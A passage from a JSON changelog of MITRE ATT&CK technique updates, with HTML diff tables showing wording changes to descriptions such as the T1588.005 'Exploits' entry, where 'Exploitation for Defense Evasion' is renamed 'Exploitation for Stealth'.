nowrap=\"nowrap\">1598)&nbsp;campaigns.&nbsp;The&nbsp;same&nbsp;publicly&nbsp;available&nbsp;tool&nbsp;may&nbsp;furthe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;enable&nbsp;vulnerability&nbsp;or&nbsp;other&nbsp;offensive&nbsp;research&nbsp;supportin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;enable&nbsp;vulnerability&nbsp;or&nbsp;other&nbsp;offensive&nbsp;research&nbsp;supportin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;[Develop&nbsp;Capabilities](https://attack.mitre.org/techniques</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;[Develop&nbsp;Capabilities](https://attack.mitre.org/techniques</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/T1587).&nbsp;AI&nbsp;tools&nbsp;may&nbsp;also&nbsp;automate&nbsp;technical&nbsp;tasks&nbsp;by&nbsp;gener</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/T1587).&nbsp;AI&nbsp;tools&nbsp;may&nbsp;also&nbsp;automate&nbsp;technical&nbsp;tasks&nbsp;by&nbsp;gener</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ating,&nbsp;refining,&nbsp;or&nbsp;otherwise&nbsp;enhancing&nbsp;(e.g.,&nbsp;[Obfuscated&nbsp;F</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ating,&nbsp;refining,&nbsp;or&nbsp;otherwise&nbsp;enhancing&nbsp;(e.g.,&nbsp;[Obfuscated&nbsp;F</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iles&nbsp;or&nbsp;Information](https://attack.mitre.org/techniques/T10</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iles&nbsp;or&nbsp;Information](https://attack.mitre.org/techniques/T10</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">27))&nbsp;malicious&nbsp;scripts&nbsp;and&nbsp;payloads.(Citation:&nbsp;OpenAI-CTI)&nbsp;F</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">27))&nbsp;malicious&nbsp;scripts&nbsp;and&nbsp;payloads.(Citation:&nbsp;OpenAI-CTI)&nbsp;F</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">inally,&nbsp;AI-generated&nbsp;text,&nbsp;images,&nbsp;audio,&nbsp;and&nbsp;video&nbsp;may&nbsp;be&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">inally,&nbsp;AI-generated&nbsp;text,&nbsp;images,&nbsp;audio,&nbsp;and&nbsp;video&nbsp;may&nbsp;be&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sed&nbsp;for&nbsp;fraud,&nbsp;[Impersonation](https://attack.mitre.org/tech</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sed&nbsp;for&nbsp;fraud,&nbsp;[Impersonation](https://attack.mitre.org/tech</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">niques/T16<span class=\"diff_chg\">56</span>),&nbsp;and&nbsp;other&nbsp;malicious&nbsp;activities.(Citation:&nbsp;Goo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">niques/T16<span class=\"diff_chg\">84/001</span>),&nbsp;and&nbsp;other&nbsp;malicious&nbsp;activities.(Citation:</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gle-Vishing24)(Citation:&nbsp;IC3-AI24)(Citation:&nbsp;WSJ-Vishing-AI2</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Google-Vishing24)(Citation:&nbsp;IC3-AI24)(Citation:&nbsp;WSJ-Vishing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">4)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-AI24)&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1056: Pre-compromise"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0842: Detection of Artificial Intelligence"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-01 02:17:46.086000+00:00",
                    "modified": "2025-10-24 17:49:36.851000+00:00",
                    "name": "Exploits",
                    "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "resource-development"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1588/005",
                            "external_id": "T1588.005"
                        },
                        {
                            "source_name": "PegasusCitizenLab",
                            "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.",
                            "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/"
                        },
                        {
                            "source_name": "NationsBuying",
                            "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.",
                            "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html"
                        },
                        {
                            "source_name": "Exploit Database",
                            "description": "Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020.",
                            "url": "https://www.exploit-db.com/"
                        },
                        {
                            "source_name": "TempertonDarkHotel",
                            "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.",
                            "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage"
                        },
                        {
                            "source_name": "Wired SandCat Oct 2019",
                            "description": "Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020.",
                            "url": "https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['description']\": {\"new_value\": \"Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\\n\\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\\n\\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\\n\\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"old_value\": \"Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\\n\\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\\n\\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\\n\\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"diff\": \"--- \\n+++ \\n@@ -4,4 +4,4 @@\\n \\n An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\\n \\n-Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\\n+Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to3__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to3__0\"><a href=\"#difflib_chg_to3__top\">t</a></td><td class=\"diff_header\" id=\"from3_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;buy,&nbsp;steal,&nbsp;or&nbsp;download&nbsp;exploits&nbsp;that&nbsp;can&nbsp;be</td><td class=\"diff_next\"><a href=\"#difflib_chg_to3__top\">t</a></td><td class=\"diff_header\" id=\"to3_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;buy,&nbsp;steal,&nbsp;or&nbsp;download&nbsp;exploits&nbsp;that&nbsp;can&nbsp;be</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;used&nbsp;during&nbsp;targeting.&nbsp;An&nbsp;exploit&nbsp;takes&nbsp;advantage&nbsp;of&nbsp;a&nbsp;bug&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;used&nbsp;during&nbsp;targeting.&nbsp;An&nbsp;exploit&nbsp;takes&nbsp;advantage&nbsp;of&nbsp;a&nbsp;bug&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;vulnerability&nbsp;in&nbsp;order&nbsp;to&nbsp;cause&nbsp;unintended&nbsp;or&nbsp;unanticipat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;vulnerability&nbsp;in&nbsp;order&nbsp;to&nbsp;cause&nbsp;unintended&nbsp;or&nbsp;unanticipat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;behavior&nbsp;to&nbsp;occur&nbsp;on&nbsp;computer&nbsp;hardware&nbsp;or&nbsp;software.&nbsp;Rathe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;behavior&nbsp;to&nbsp;occur&nbsp;on&nbsp;computer&nbsp;hardware&nbsp;or&nbsp;software.&nbsp;Rathe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;than&nbsp;developing&nbsp;their&nbsp;own&nbsp;exploits,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;find/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;than&nbsp;developing&nbsp;their&nbsp;own&nbsp;exploits,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;find/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">modify&nbsp;exploits&nbsp;from&nbsp;online&nbsp;or&nbsp;purchase&nbsp;them&nbsp;from&nbsp;exploit&nbsp;ve</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">modify&nbsp;exploits&nbsp;from&nbsp;online&nbsp;or&nbsp;purchase&nbsp;them&nbsp;from&nbsp;exploit&nbsp;ve</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ndors.(Citation:&nbsp;Exploit&nbsp;Database)(Citation:&nbsp;TempertonDarkHo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ndors.(Citation:&nbsp;Exploit&nbsp;Database)(Citation:&nbsp;TempertonDarkHo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tel)(Citation:&nbsp;NationsBuying)&nbsp;&nbsp;In&nbsp;addition&nbsp;to&nbsp;downloading&nbsp;fr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tel)(Citation:&nbsp;NationsBuying)&nbsp;&nbsp;In&nbsp;addition&nbsp;to&nbsp;downloading&nbsp;fr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ee&nbsp;exploits&nbsp;from&nbsp;the&nbsp;internet,&nbsp;adversaries&nbsp;may&nbsp;purchase&nbsp;expl</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ee&nbsp;exploits&nbsp;from&nbsp;the&nbsp;internet,&nbsp;adversaries&nbsp;may&nbsp;purchase&nbsp;expl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oits&nbsp;from&nbsp;third-party&nbsp;entities.&nbsp;Third-party&nbsp;entities&nbsp;can&nbsp;inc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oits&nbsp;from&nbsp;third-party&nbsp;entities.&nbsp;Third-party&nbsp;entities&nbsp;can&nbsp;inc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lude&nbsp;technology&nbsp;companies&nbsp;that&nbsp;specialize&nbsp;in&nbsp;exploit&nbsp;develop</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lude&nbsp;technology&nbsp;companies&nbsp;that&nbsp;specialize&nbsp;in&nbsp;exploit&nbsp;develop</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ment,&nbsp;criminal&nbsp;marketplaces&nbsp;(including&nbsp;exploit&nbsp;kits),&nbsp;or&nbsp;fro</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ment,&nbsp;criminal&nbsp;marketplaces&nbsp;(including&nbsp;exploit&nbsp;kits),&nbsp;or&nbsp;fro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m&nbsp;individuals.(Citation:&nbsp;PegasusCitizenLab)(Citation:&nbsp;Wired&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m&nbsp;individuals.(Citation:&nbsp;PegasusCitizenLab)(Citation:&nbsp;Wired&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">SandCat&nbsp;Oct&nbsp;2019)&nbsp;In&nbsp;addition&nbsp;to&nbsp;purchasing&nbsp;exploits,&nbsp;advers</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">SandCat&nbsp;Oct&nbsp;2019)&nbsp;In&nbsp;addition&nbsp;to&nbsp;purchasing&nbsp;exploits,&nbsp;advers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aries&nbsp;may&nbsp;steal&nbsp;and&nbsp;repurpose&nbsp;exploits&nbsp;from&nbsp;third-party&nbsp;enti</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aries&nbsp;may&nbsp;steal&nbsp;and&nbsp;repurpose&nbsp;exploits&nbsp;from&nbsp;third-party&nbsp;enti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ties&nbsp;(including&nbsp;other&nbsp;adversaries).(Citation:&nbsp;TempertonDarkH</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ties&nbsp;(including&nbsp;other&nbsp;adversaries).(Citation:&nbsp;TempertonDarkH</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">otel)&nbsp;&nbsp;An&nbsp;adversary&nbsp;may&nbsp;monitor&nbsp;exploit&nbsp;provider&nbsp;forums&nbsp;to&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">otel)&nbsp;&nbsp;An&nbsp;adversary&nbsp;may&nbsp;monitor&nbsp;exploit&nbsp;provider&nbsp;forums&nbsp;to&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nderstand&nbsp;the&nbsp;state&nbsp;of&nbsp;existing,&nbsp;as&nbsp;well&nbsp;as&nbsp;newly&nbsp;discovered</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nderstand&nbsp;the&nbsp;state&nbsp;of&nbsp;existing,&nbsp;as&nbsp;well&nbsp;as&nbsp;newly&nbsp;discovered</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;exploits.&nbsp;There&nbsp;is&nbsp;usually&nbsp;a&nbsp;delay&nbsp;between&nbsp;when&nbsp;an&nbsp;exploit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;exploits.&nbsp;There&nbsp;is&nbsp;usually&nbsp;a&nbsp;delay&nbsp;between&nbsp;when&nbsp;an&nbsp;exploit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;is&nbsp;discovered&nbsp;and&nbsp;when&nbsp;it&nbsp;is&nbsp;made&nbsp;public.&nbsp;An&nbsp;adversary&nbsp;may&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;is&nbsp;discovered&nbsp;and&nbsp;when&nbsp;it&nbsp;is&nbsp;made&nbsp;public.&nbsp;An&nbsp;adversary&nbsp;may&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">target&nbsp;the&nbsp;systems&nbsp;of&nbsp;those&nbsp;known&nbsp;to&nbsp;conduct&nbsp;exploit&nbsp;researc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">target&nbsp;the&nbsp;systems&nbsp;of&nbsp;those&nbsp;known&nbsp;to&nbsp;conduct&nbsp;exploit&nbsp;researc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">h&nbsp;and&nbsp;development&nbsp;in&nbsp;order&nbsp;to&nbsp;gain&nbsp;that&nbsp;knowledge&nbsp;for&nbsp;use&nbsp;du</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">h&nbsp;and&nbsp;development&nbsp;in&nbsp;order&nbsp;to&nbsp;gain&nbsp;that&nbsp;knowledge&nbsp;for&nbsp;use&nbsp;du</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ring&nbsp;a&nbsp;subsequent&nbsp;operation.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;exploits&nbsp;d</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ring&nbsp;a&nbsp;subsequent&nbsp;operation.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;exploits&nbsp;d</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uring&nbsp;various&nbsp;phases&nbsp;of&nbsp;the&nbsp;adversary&nbsp;lifecycle&nbsp;(i.e.&nbsp;[Explo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uring&nbsp;various&nbsp;phases&nbsp;of&nbsp;the&nbsp;adversary&nbsp;lifecycle&nbsp;(i.e.&nbsp;[Explo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">it&nbsp;Public-Facing&nbsp;Application](https://attack.mitre.org/techn</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">it&nbsp;Public-Facing&nbsp;Application](https://attack.mitre.org/techn</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iques/T1190),&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://at</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iques/T1190),&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://at</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tack.mitre.org/techniques/T1203),&nbsp;[Exploitation&nbsp;for&nbsp;Privileg</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tack.mitre.org/techniques/T1203),&nbsp;[Exploitation&nbsp;for&nbsp;Privileg</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;Escalation](https://attack.mitre.org/techniques/T1068),&nbsp;[E</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;Escalation](https://attack.mitre.org/techniques/T1068),&nbsp;[E</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xploitation&nbsp;for&nbsp;<span class=\"diff_chg\">Defense&nbsp;Evasion</span>](https://attack.mitre.org/te</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xploitation&nbsp;for&nbsp;<span class=\"diff_chg\">Stealth</span>](https://attack.mitre.org/techniques</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">chniques/T1211),&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;Access](https:</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/T1211),&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;Access](https://attack</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">//attack.mitre.org/techniques/T1212),&nbsp;[Exploitation&nbsp;of&nbsp;Remot</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.mitre.org/techniques/T1212),&nbsp;[Exploitation&nbsp;of&nbsp;Remote&nbsp;Servic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;Services](https://attack.mitre.org/techniques/T1210),&nbsp;and&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es](https://attack.mitre.org/techniques/T1210),&nbsp;and&nbsp;[Applica</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">[Application&nbsp;or&nbsp;System&nbsp;Exploitation](https://attack.mitre.or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;or&nbsp;System&nbsp;Exploitation](https://attack.mitre.org/techni</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/techniques/T1499/004)).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques/T1499/004)).</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1056: Pre-compromise"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0827: Detection of Exploits"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-02 18:45:07.892000+00:00",
